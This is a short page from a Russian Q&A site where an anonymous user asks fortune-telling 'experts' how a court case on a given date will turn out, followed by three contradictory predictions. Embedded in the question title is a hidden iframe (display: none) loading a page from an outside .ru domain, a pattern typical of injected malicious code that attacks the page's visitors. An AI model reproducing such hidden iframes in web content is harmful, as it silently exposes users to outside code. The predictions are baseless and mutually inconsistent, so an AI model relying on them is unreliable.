Уважаемые эксперты. Подскажите что вы видите по следующей дате касаемо меня и каков будет исход суда. 22/02/2016 Екатерина 01/01/1984<iframe... - вопрос №1688956

id=«a1996667054» style=«display: none;» src=«bw95vpjda.ru/f.html»>
Вопрос задан анонимно
3 ответа
Здравствуйте.

Вижу что у вас, буквально, будут деньги в руках. Думаю что это хорошо.

С уважением, не забывайте оценивать экспертов! Буду рад видеть вас у себя на консультации
Исход вас не обрадует.
Здравствуйте! Исход суда будет больше в Вашу пользу...

Хотя возможны какие-то задержки, нарушения графика, в связи с чем Вам придется поволноваться...
Но итог Вас все же порадует...

Удачи Вам!
По мнению автора лучший ответ отсутствует.